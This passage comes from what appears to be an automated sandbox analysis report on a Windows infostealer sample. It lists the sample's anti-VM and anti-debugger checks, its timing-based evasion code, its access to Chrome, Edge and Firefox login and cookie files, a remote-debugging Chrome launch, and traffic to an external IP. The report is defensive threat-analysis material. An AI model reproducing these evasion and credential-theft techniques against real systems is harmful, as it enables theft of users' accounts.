0x00000059 mov di, 4EF2h 0x0000005d pushad 0x0000005e popad 0x0000005f popad 0x00000060 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6EC02D1 second address: 6EC02D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6EC02D7 second address: 6EC02DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6EF080B second address: 6EF0811 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6EF0811 second address: 6EF08A5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebp 0x00000009 pushad 0x0000000a mov cl, 18h 0x0000000c pushfd 0x0000000d jmp 00007FF6D0B95BF1h 0x00000012 sbb esi, 29D7DA56h 0x00000018 jmp 00007FF6D0B95BF1h 0x0000001d popfd 0x0000001e popad 0x0000001f mov dword ptr [esp], ebp 0x00000022 push eax 0x00000023 push edx 0x00000024 pushad 0x00000025 pushfd 0x00000026 jmp 00007FF6D0B95BF3h 0x0000002b sub esi, 371A0B8Eh 0x00000031 jmp 00007FF6D0B95BF9h 0x00000036 popfd 0x00000037 pushfd 0x00000038 jmp 00007FF6D0B95BF0h 0x0000003d xor ax, 0E08h 0x00000042 jmp 00007FF6D0B95BEBh 0x00000047 popfd 0x00000048 popad 0x00000049 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6EF08A5 second address: 6EF08AB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6EF08AB second address: 6EF08AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6EF08AF second address: 6EF08D7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a jmp 00007FF6D0B64827h 0x0000000f pop ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6EF08D7 second address: 6EF08DD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6EE0B16 second address: 6EE0B2E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF6D0B64824h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6EE0B2E second address: 6EE0B32 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6EF0A7E second address: 6EF0AE2 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 2CFE595Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push edx 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007FF6D0B64822h 0x00000012 or cx, 6CE8h 0x00000017 jmp 00007FF6D0B6481Bh 0x0000001c popfd 0x0000001d push esi 0x0000001e push ebx 0x0000001f pop eax 0x00000020 pop ebx 0x00000021 popad 0x00000022 mov dword ptr [esp], ebp 0x00000025 pushad 0x00000026 pushad 0x00000027 mov edx, ecx 0x00000029 mov cl, D4h 0x0000002b popad 0x0000002c jmp 00007FF6D0B6481Bh 0x00000031 popad 0x00000032 mov ebp, esp 0x00000034 push eax 0x00000035 push edx 0x00000036 jmp 00007FF6D0B64825h 0x0000003b rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6EF0AE2 second address: 6EF0B1E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF6D0B95BF1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push dword ptr [ebp+04h] 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FF6D0B95BECh 0x00000013 add ax, B408h 0x00000018 jmp 00007FF6D0B95BEBh 0x0000001d popfd 0x0000001e push eax 0x0000001f push edx 0x00000020 mov bx, ax 0x00000023 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6EF0B6B second address: 6EF0B70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6EF0B70 second address: 6EF0B8D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF6D0B95BF9h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6EF0B8D second address: 6EF0B91 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6F60A82 second address: 6F60AB8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF6D0B95BF1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dl, byte ptr [ebp+14h] 0x0000000c pushad 0x0000000d mov dx, cx 0x00000010 call 00007FF6D0B95BF8h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6F60AB8 second address: 6F60B95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 mov eax, dword ptr [ebp+10h] 0x00000009 jmp 00007FF6D0B64827h 0x0000000e and dl, 00000007h 0x00000011 jmp 00007FF6D0B64826h 0x00000016 test eax, eax 0x00000018 jmp 00007FF6D0B64820h 0x0000001d je 00007FF741269F05h 0x00000023 jmp 00007FF6D0B64820h 0x00000028 sub ecx, ecx 0x0000002a pushad 0x0000002b pushfd 0x0000002c jmp 00007FF6D0B64827h 0x00000031 or si, 7FCEh 0x00000036 jmp 00007FF6D0B64829h 0x0000003b popfd 0x0000003c call 00007FF6D0B64820h 0x00000041 mov cx, 3EE1h 0x00000045 pop esi 0x00000046 popad 0x00000047 inc ecx 0x00000048 jmp 00007FF6D0B6481Dh 0x0000004d shr eax, 1 0x0000004f push eax 0x00000050 push edx 0x00000051 push eax 0x00000052 push edx 0x00000053 jmp 00007FF6D0B64828h 0x00000058 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6F60B95 second address: 6F60B99 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe Special instruction interceptor: First address: 11BF990 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\u25XzKsRuY.exe Special instruction interceptor: First address: 11BFAB1 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\u25XzKsRuY.exe Special instruction interceptor: First address: 13EBA84 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\u25XzKsRuY.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc Jump to behavior
Source: C:\Users\user\Desktop\u25XzKsRuY.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion Jump to behavior
Source: C:\Users\user\Desktop\u25XzKsRuY.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion Jump to behavior
Source: C:\Users\user\Desktop\u25XzKsRuY.exe Window / User API: threadDelayed 2510 Jump to behavior
Source: C:\Users\user\Desktop\u25XzKsRuY.exe Window / User API: threadDelayed 1572 Jump to behavior
Source: C:\Users\user\Desktop\u25XzKsRuY.exe Window / User API: threadDelayed 711 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Window / User API: threadDelayed 4200 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Window / User API: threadDelayed 5799 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe API coverage: 1.2 %
Source: C:\Users\user\Desktop\u25XzKsRuY.exe TID: 8072 Thread sleep count: 49 > 30 Jump to behavior
Source: C:\Users\user\Desktop\u25XzKsRuY.exe TID: 8072 Thread sleep time: -98049s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\u25XzKsRuY.exe TID: 8080 Thread sleep count: 44 > 30 Jump to behavior
Source: C:\Users\user\Desktop\u25XzKsRuY.exe TID: 8080 Thread sleep time: -88044s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\u25XzKsRuY.exe TID: 8168 Thread sleep time: -32000s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\u25XzKsRuY.exe TID: 8068 Thread sleep count: 60 > 30 Jump to behavior
Source: C:\Users\user\Desktop\u25XzKsRuY.exe TID: 8068 Thread sleep time: -120060s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\u25XzKsRuY.exe TID: 8064 Thread sleep count: 2510 > 30 Jump to behavior
Source: C:\Users\user\Desktop\u25XzKsRuY.exe TID: 8064 Thread sleep time: -5022510s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\u25XzKsRuY.exe TID: 8052 Thread sleep count: 1572 > 30 Jump to behavior
Source: C:\Users\user\Desktop\u25XzKsRuY.exe TID: 8052 Thread sleep time: -3145572s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\u25XzKsRuY.exe TID: 8064 Thread sleep count: 711 > 30 Jump to behavior
Source: C:\Users\user\Desktop\u25XzKsRuY.exe TID: 8064 Thread sleep time: -1422711s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe TID: 5212 Thread sleep count: 4200 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe TID: 5212 Thread sleep time: -420000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe TID: 5212 Thread sleep count: 5799 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe TID: 5212 Thread sleep time: -579900s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\service123.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\u25XzKsRuY.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\Desktop\u25XzKsRuY.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\ Jump to behavior
Source: C:\Users\user\Desktop\u25XzKsRuY.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\ Jump to behavior
Source: C:\Users\user\Desktop\u25XzKsRuY.exe File opened: C:\Users\user\.ms-ad\ Jump to behavior
Source: C:\Users\user\Desktop\u25XzKsRuY.exe File opened: C:\Users\user\AppData\Local\ Jump to behavior
Source: C:\Users\user\Desktop\u25XzKsRuY.exe File opened: C:\Users\user\AppData\Local\Google\ Jump to behavior
Source: C:\Users\user\Desktop\u25XzKsRuY.exe File opened: C:\Users\user\AppData\ Jump to behavior
Source: Amcache.hve.14.dr Binary or memory string: VMware
Source: Amcache.hve.14.dr Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.14.dr Binary or memory string: vmci.syshbin
Source: Amcache.hve.14.dr Binary or memory string: VMware, Inc.
Source: Amcache.hve.14.dr Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.14.dr Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.14.dr Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.14.dr Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.14.dr Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: u25XzKsRuY.exe, 00000000.00000003.1303473733.00000000071E0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: SYSINTERNALSNum_processorNum_ramnameallfreedriversNum_displaysresolution_xresolution_y\*recent_filesprocessesuptime_minutesC:\Windows\System32\VBox*.dll01vbox_firstSYSTEM\ControlSet001\Services\VBoxSFvbox_secondC:\USERS\PUBLIC\public_checkWINDBG.EXEdbgwireshark.exeprocmon.exex64dbg.exeida.exedbg_secdbg_thirdyadroinstalled_appsSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallSOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall%d%s\%sDisplayNameapp_nameindexCreateToolhelp32Snapshot failed.
Source: Amcache.hve.14.dr Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.14.dr Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.14.dr Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: chrome.exe, 00000003.00000002.1716589798.0000028A464B8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: Amcache.hve.14.dr Binary or memory string: vmci.sys
Source: u25XzKsRuY.exe, 00000000.00000003.1303473733.00000000071E0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: SYSTEM\ControlSet001\Services\VBoxSF
Source: Amcache.hve.14.dr Binary or memory string: vmci.syshbin`
Source: Amcache.hve.14.dr Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.14.dr Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.14.dr Binary or memory string: VMware-42 27 ae 88 8c 2b 21 02-a5 86 22 5b 84 51 ac f0
Source: Amcache.hve.14.dr Binary or memory string: VMware20,1
Source: Amcache.hve.14.dr Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.14.dr Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.14.dr Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.14.dr Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.14.dr Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.14.dr Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.14.dr Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.14.dr Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.14.dr Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.14.dr Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.14.dr Binary or memory string: vmci.inf_amd64_68ed49469341f563
Source: C:\Users\user\Desktop\u25XzKsRuY.exe System information queried: ModuleInformation Jump to behavior
Source: C:\Users\user\Desktop\u25XzKsRuY.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging

barindex
Source: C:\Users\user\Desktop\u25XzKsRuY.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\Desktop\u25XzKsRuY.exe Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\u25XzKsRuY.exe Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\u25XzKsRuY.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\u25XzKsRuY.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\u25XzKsRuY.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\u25XzKsRuY.exe Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\u25XzKsRuY.exe Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\u25XzKsRuY.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\u25XzKsRuY.exe File opened: NTICE
Source: C:\Users\user\Desktop\u25XzKsRuY.exe File opened: SICE
Source: C:\Users\user\Desktop\u25XzKsRuY.exe File opened: SIWVID
Source: C:\Users\user\Desktop\u25XzKsRuY.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\u25XzKsRuY.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\u25XzKsRuY.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_00208230 LoadLibraryA,GetProcAddress,FreeLibrary,GetLastError, 9_2_00208230
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_0020116C Sleep,Sleep,SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv,_amsg_exit,_initterm,GetStartupInfoA,_cexit,_initterm,exit, 9_2_0020116C
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_00201160 Sleep,SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv, 9_2_00201160
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_002011A3 Sleep,SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv, 9_2_002011A3
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_002013C9 SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv,_amsg_exit,_initterm, 9_2_002013C9
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_6C8C84D0 cpuid 9_2_6C8C84D0
Source: C:\Users\user\Desktop\u25XzKsRuY.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Source: C:\Users\user\Desktop\u25XzKsRuY.exe Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\u25XzKsRuY.exe Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\u25XzKsRuY.exe Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\u25XzKsRuY.exe Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\u25XzKsRuY.exe Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\u25XzKsRuY.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\u25XzKsRuY.exe Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\u25XzKsRuY.exe Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\u25XzKsRuY.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
Source: u25XzKsRuY.exe, 00000000.00000003.1303473733.00000000071E0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: procmon.exe
Source: Amcache.hve.14.dr Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.14.dr Binary or memory string: msmpeng.exe
Source: u25XzKsRuY.exe, 00000000.00000003.1303473733.00000000071E0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: wireshark.exe
Source: Amcache.hve.14.dr Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.14.dr Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information

barindex
Source: Yara match File source: 9.2.service123.exe.6c840000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: Process Memory Space: service123.exe PID: 7580, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP
Source: global traffic TCP traffic: 192.168.2.10:49715 -> 185.121.15.192:80
Source: C:\Users\user\Desktop\u25XzKsRuY.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\u25XzKsRuY.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\key4.db Jump to behavior
Source: C:\Users\user\Desktop\u25XzKsRuY.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Users\user\Desktop\u25XzKsRuY.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\cookies.sqlite Jump to behavior
Source: C:\Users\user\Desktop\u25XzKsRuY.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\u25XzKsRuY.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Users\user\Desktop\u25XzKsRuY.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior

Remote Access Functionality

barindex
Source: C:\Users\user\Desktop\u25XzKsRuY.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default"
Source: Yara match File source: dump.pcap, type: PCAP
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs